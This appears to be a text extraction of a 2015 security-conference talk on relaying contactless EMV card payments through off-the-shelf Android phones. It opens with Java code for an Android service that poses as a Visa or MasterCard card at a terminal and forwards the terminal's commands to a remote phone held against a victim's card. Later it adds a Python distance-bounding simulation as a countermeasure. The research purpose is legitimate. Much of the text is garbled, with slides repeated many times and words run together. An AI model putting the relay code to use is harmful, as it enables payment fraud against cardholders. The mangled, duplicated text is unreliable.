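//     <aid-group android:description="@string/relay_desc" android:category="payment">
//       <aid-filter android:name="325041592E5359532E4444463031"/> <!-- 2PAY.SYS.DDF01 (PPSE) -->
//       <aid-filter android:name="A0000000041010"/>               <!-- MasterCard -->
//       <aid-filter android:name="A0000000031010"/>               <!-- Visa -->
//     </aid-group>
//   </host-apdu-service>
public class RelayApduService extends HostApduService {
    private static final String TAG = "RelayHce";
    // ISO/IEC 7816-4 status word "no precise diagnosis", returned when the relay fails.
    private static final byte[] SW_NO_PRECISE_DIAGNOSIS = {(byte) 0x6F, 0x00};

    // Hypothetical transport to the phone that holds the victim's card.
    interface RelayChannel {
        void writeCommand(byte[] apdu) throws IOException;
        byte[] readResponse() throws IOException;  // the real card's answer
        void endSession();
    }

    private RelayChannel channel;  // assumed to be connected in onCreate() by the app

    @Override
    public byte[] processCommandApdu(byte[] commandApdu, Bundle extras) {
        if (channel == null) return SW_NO_PRECISE_DIAGNOSIS;
        if (isSelectByName(commandApdu)) {
            int lc = commandApdu[4] & 0xFF;
            Log.i(TAG, "terminal SELECTed AID " + hex(Arrays.copyOfRange(commandApdu, 5, 5 + lc)));
        }
        // Returning null means "the response will be delivered later with
        // sendResponseApdu()". The round trip to the real card must not block
        // this callback, so it runs on a worker thread.
        new Thread(() -> {
            byte[] rsp;
            try {
                channel.writeCommand(commandApdu);
                rsp = channel.readResponse();
            } catch (IOException e) {
                Log.e(TAG, "relay channel failed: " + e);
                rsp = null;
            }
            sendResponseApdu(rsp != null ? rsp : SW_NO_PRECISE_DIAGNOSIS);
        }).start();
        return null;
    }

    @Override
    public void onDeactivated(int reason) {
        // DEACTIVATION_LINK_LOSS is what a terminal that stopped waiting (relay
        // slower than its frame waiting time) looks like from this side.
        Log.i(TAG, "deactivated: " + (reason == DEACTIVATION_LINK_LOSS ? "link loss" : "deselected"));
        if (channel != null) channel.endSession();
    }

    // ISO/IEC 7816-4 SELECT by DF name: CLA=00 INS=A4 P1=04 P2=00 Lc AID [Le].
    static boolean isSelectByName(byte[] apdu) {
        return apdu != null && apdu.length >= 6
                && apdu[0] == 0x00 && apdu[1] == (byte) 0xA4 && apdu[2] == 0x04
                && apdu.length >= 5 + (apdu[4] & 0xFF);
    }

    static String hex(byte[] b) {
        StringBuilder sb = new StringBuilder(b.length * 2);
        for (byte x : b) sb.append(String.format("%02X", x));
        return sb.toString();
    }
}
```

Two caveats follow from the routing table. With category "payment" Android only routes to the app the user has picked as default under Settings > Tap & pay, so a relay app either has to be selected there or register its AIDs under category "other". And the FWI advertised to the terminal in the ATS is chosen by the NFCC, not by the app, so the terminal's patience with this phone is fixed in firmware; the experiment in the next section measures whether the relay's latency fits inside it.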

Android and NFC: A Tale of L♥ve (V) – Digging into the Android NFC stack: Summary

Description                                        | Language(s) | Dependency                | OSS
NFC developer framework (com.android.nfc package)  | Java, C++   | API level                 | Yes
System NFC library (libnfc-nxp or libnfc-nci)      | C/C++       | Manufacturer              | Yes
NFC Android kernel driver                          | C           | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory)   | ARM Thumb   | Hardware and manufacturer | No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI) – Some remarkable limitations

Limitation 1 – Dishonest verifier communicates with a MIFARE Classic
libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands, because the CRC computation is performed by the NFCC.
Can only be overcome if the NFCC is modified.
EMV contactless cards are IsoDep, i.e. fully ISO/IEC 14443-compliant, so this limitation does not affect them.

Limitation 2 – Dishonest prover communicates with an honest verifier (device in HCE mode)
The AID must be known in advance (it has to be declared in the HCE service's AID filter).
Can be overcome if the device is rooted: the Xposed framework may help to hook the routing, but it needs root permissions.


Android and NFC: A Tale of L♥ve (VII) – Some remarkable limitations and remarks

Limitation 3 – Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, with 0 ≤ FWI ≤ 14 and fc = 13.56 MHz.
FWT therefore ranges from ≈302 µs (FWI = 0) to ≈4.95 s (FWI = 14) → a relay is theoretically possible whenever the added delay stays below ≈5 s.

Concluding remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed.
Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed.

And now, let's move to the practice ☺


Relay Attack Implementation (I) – Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support.
Android app developed (±2000 LOC); two OTS Android NFC-capable devices.
One constraint only: the dishonest prover must run Android ≥ 4.4 (HCE); the dishonest verifier only needs Reader/Writer mode, available since Android 2.3.3.


Relay Attack Implementation (II) – Threat Scenarios: Scenario 1, Distributed Mafia Fraud

(Figure: a BOTMASTER coordinating several BOTs, each an NFC-enabled device acting as one end of a relay.)

Relay Attack Implementation (III) – Threat Scenarios: Scenario 2, Hiding Fraud Locations

(Figure only.)

Relay Attack Implementation (IV) – Resistant Mechanisms

Brief summary of resistant mechanisms:
Distance-bounding protocols: upper-bounding the physical distance using the round-trip time of cryptographic challenge-response messages.
Timing constraints: not enforced in current NFC-capable systems, and the protocol itself allows timing extension commands (waiting time extensions).
Physical countermeasures:
  whitelisting/blacklisting: with random UIDs in HCE mode → unfeasible;
  RFID blocking covers;
  physical button/switch activation;
  secondary authentication methods (e.g. on-card fingerprint scanners).


Related Work – On relay attacks

2005–2009: first works, built on specific hardware.
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app.
2012–2013: relay attacks on Android accessing Secure Elements (a SE securely stores the data associated with credit/debit cards); needs a non-OTS Android device.
2014: active relay attacks with custom hardware and custom Android firmware.
Several works studied the delay introduced by the relay channel: relays over long distances are feasible → latency isn't a hard constraint.

Ask us for specific references: too many names for a single slide.


Conclusions (I)

Security of NFC is based on the physical proximity assumption.
NFC threats: eavesdropping, data modification, relay attacks.
Android NFC-capable devices are on the rise, and can be abused to interact with cards in their proximity.

Conclusions:
  review of the Android NFC stack;
  proof-of-concept of relay attacks using Android OTS devices;
  threat scenarios introduced;
  virtual pickpocketing attacks may appear before long.


Conclusions (II)

But then, what the hell can I do? Should I run away?


Conclusions (III)

Future work:
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks with EMV contactless cards

Acknowledgments: Spanish National Cybersecurity Institute (INCIBE); University of León under contract X43; HITB staff.

And thanks to all for listening to us.
Visit http://vwzq.net/relaynfc for more info about the project.

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 15: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV): Resistant Mechanisms

Brief summary of resistant mechanisms
Distance-bounding protocols
  Upper-bound the physical distance using the round-trip time of cryptographic challenge-response messages
Timing constraints
  Not enforced in current NFC-capable systems
  The protocol itself allows timing-extension commands (S(WTX) in ISO/IEC 14443-4), so a slow responder can simply ask for more time
Physical countermeasures
  Whitelisting/blacklisting by UID: HCE mode uses a random UID → unfeasible
  RFID blocking covers
  Physical button/switch activation
  Secondary authentication methods (e.g. on-card fingerprint scanners)
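The distance-bounding idea in the first bullet, as an added example that is not part of the talk or its app: a verifier times a cryptographic challenge-response over a virtual clock and rejects replies that are correct but arrive later than a card sitting in the reader's field could deliver them. The shared key, the link latencies and the 200 µs bound are assumptions chosen for the simulation; the honest card is a Python object, not an NFC device, and real distance-bounding protocols use single-bit rapid exchanges on dedicated hardware rather than an HMAC over a byte string.

```python
"""Distance-bounding style check: the verifier times a cryptographic
challenge-response and rejects answers that are correct but arrive later than a
card touching the reader could deliver them. Added example over a virtual clock."""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Callable, Dict

Path = Callable[[bytes], bytes]      # anything that takes a challenge and returns a reply

@dataclass
class Clock:
    """Virtual time so the runs are deterministic; a real verifier reads a hardware timer."""
    now: float = 0.0
    def advance(self, seconds: float) -> None:
        self.now += seconds

@dataclass
class Card:
    """Honest prover: replies with a truncated HMAC over the challenge under the shared key."""
    clock: Clock
    key: bytes
    compute_time: float = 50e-6      # assumed 50 us to compute the reply
    def respond(self, challenge: bytes) -> bytes:
        self.clock.advance(self.compute_time)
        return hmac.new(self.key, challenge, hashlib.sha256).digest()[:8]

def hop(clock: Clock, one_way: float, inner: Path) -> Path:
    """Wrap a path in a link that costs `one_way` seconds in each direction."""
    def send(challenge: bytes) -> bytes:
        clock.advance(one_way)
        reply = inner(challenge)
        clock.advance(one_way)
        return reply
    return send

def distance_bound(clock: Clock, key: bytes, path: Path, rtt_bound: float, rounds: int = 8) -> Dict[str, object]:
    """Verifier: `rounds` fresh challenges; accept only if every reply is correct and within rtt_bound."""
    worst_rtt, crypto_ok = 0.0, True
    for _ in range(rounds):
        challenge = os.urandom(8)
        started = clock.now
        reply = path(challenge)
        worst_rtt = max(worst_rtt, clock.now - started)
        expected = hmac.new(key, challenge, hashlib.sha256).digest()[:8]
        crypto_ok = crypto_ok and hmac.compare_digest(reply, expected)
    return {"accept": crypto_ok and worst_rtt <= rtt_bound, "crypto_ok": crypto_ok, "worst_rtt": worst_rtt}

# Assumed parameters of the simulation.
KEY = bytes(range(16))
RF_ONE_WAY = 1e-6          # 1 us per direction over the contactless link
RELAY_ONE_WAY = 40e-3      # 40 ms per direction over the attackers' network channel
RTT_BOUND = 200e-6         # 200 us: what a card in the reader's field can meet

def run_direct(clock: Clock) -> Dict[str, object]:
    """Card in the terminal's field."""
    card = Card(clock, KEY)
    return distance_bound(clock, KEY, hop(clock, RF_ONE_WAY, card.respond), RTT_BOUND)

def run_relayed(clock: Clock) -> Dict[str, object]:
    """Mafia fraud: terminal <-> dishonest prover <-> network <-> dishonest verifier <-> real card."""
    card = Card(clock, KEY)
    to_card = hop(clock, RF_ONE_WAY, card.respond)        # dishonest verifier's RF hop to the card
    over_net = hop(clock, RELAY_ONE_WAY, to_card)         # relay channel between the two phones
    return distance_bound(clock, KEY, hop(clock, RF_ONE_WAY, over_net), RTT_BOUND)

def run_keyless(clock: Clock) -> Dict[str, object]:
    """Attacker without the key who answers in time: fails the cryptographic half instead."""
    impostor = Card(clock, b"\x00" * 16)
    return distance_bound(clock, KEY, hop(clock, RF_ONE_WAY, impostor.respond), RTT_BOUND)
```

The relayed run passes the cryptographic check, because the real card computed every answer, and fails only on timing; nothing inside the exchange distinguishes a relay, only the round-trip time does. The caveat from the slide applies: a deployed ISO/IEC 14443-4 terminal enforces FWT (milliseconds to seconds) and grants waiting-time extensions, so a bound like the one above has to come from a dedicated protocol layer, not from the existing timeouts.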


Related Work: On relay attacks

2005-2009: first works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: relay attacks on Android accessing Secure Elements
  A SE securely stores data associated with credit/debit cards
  Needs a non-OTS Android device
2014: active relay attacks with custom hardware and custom Android firmware
Several works studied the delay introduced by the relay channel
  Relays over long distances are feasible → latency isn't a hard constraint
Ask us for specific references: too many names for a single slide


Conclusions (I)

Security of NFC rests on the physical-proximity assumption
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are on the rise
  They can be abused to interact with cards in their proximity
Conclusions
  Review of the Android NFC stack
  Proof-of-Concept of relay attacks using Android OTS devices
  Threat scenarios introduced
  Virtual pickpocketing attacks may appear before long

Conclusions (II): But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks against EMV contactless cards
Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff
And thanks to all for listening to us
Visit http://vwzq.net/relaynfc for more info about the project

Introduction to NFC (VII)

Ok. So it is secure, right? Right?
If it were so secure you would not be staring at us

NFC security threats
Eavesdropping
  Secure communication as the solution
Data modification (i.e. alteration, insertion or destruction)
  Feasible in theory (but requires quite advanced RF knowledge)
Relays
  Forwarding of wireless communication
  Two types: passive (just forwards) or active (forwards and alters the data)
  We focus on passive relay attacks

Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
  The payment sector is quite interested in this new way of making payments
  500M NFC payment users expected by 2019
  Almost 300 smartphones available at the moment with NFC capabilities
    Check http://www.nfcworld.com/nfc-phones-list/
  Most of them run Android OS
Research Hypothesis
  Can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device?
  If so, what are the constraints (if any)?


Background (I): EMV contactless cards

Europay, MasterCard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
Authenticates credit and debit card transactions
Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
Applications on the card are chosen with the SELECT command by Application Identifier (AID): the terminal must know which AID to select before anything else happens
